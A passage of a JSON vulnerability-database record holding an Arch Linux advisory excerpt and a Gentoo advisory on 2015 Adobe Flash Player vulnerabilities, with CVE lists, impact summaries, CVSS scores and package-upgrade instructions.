attackers to execute arbitrary code\nvia unspecified vectors, a different vulnerability than CVE-2015-0309.\n\n- CVE-2015-0303 (remote code execution, denial of service)\n\nA vulnerability allows attackers to execute arbitrary code or cause a\ndenial of service (memory corruption) via unspecified vectors, a\ndifferent vulnerability than CVE-2015-0306.\n\n- CVE-2015-0302 (keylogging)\n\nA vulnerability allows attackers to obtain sensitive keystroke\ninformation via unspecified vectors.\n\n- CVE-2015-0301 (file validation)\n\nThe flashplugin does not properly validate files, which has unspecified\nimpact and attack vectors.", "modified": "2015-01-23T00:00:00", "published": "2015-01-23T00:00:00", "id": "ASA-201501-22", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-January/000220.html", "type": "archlinux", "title": "flashplugin: multiple issues", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:19", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0326", "CVE-2015-0328", "CVE-2015-0329", "CVE-2015-0327", "CVE-2015-0321", "CVE-2015-0317", "CVE-2015-0303", "CVE-2015-0305", "CVE-2015-0304", "CVE-2015-0308", "CVE-2015-0330", "CVE-2015-0301", "CVE-2015-0309", "CVE-2015-0314", "CVE-2015-0302", "CVE-2015-0322", "CVE-2015-0324", "CVE-2015-0315", "CVE-2015-0311", "CVE-2015-0318", "CVE-2015-0307", "CVE-2015-0319", "CVE-2015-0325", "CVE-2015-0316", "CVE-2015-0306", "CVE-2015-0320", "CVE-2015-0310", "CVE-2015-0323"], "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. 
\n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-11.2.202.442\"", "edition": 1, "modified": "2015-02-06T00:00:00", "published": "2015-02-06T00:00:00", "id": "GLSA-201502-02", "href": "https://security.gentoo.org/glsa/201502-02", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}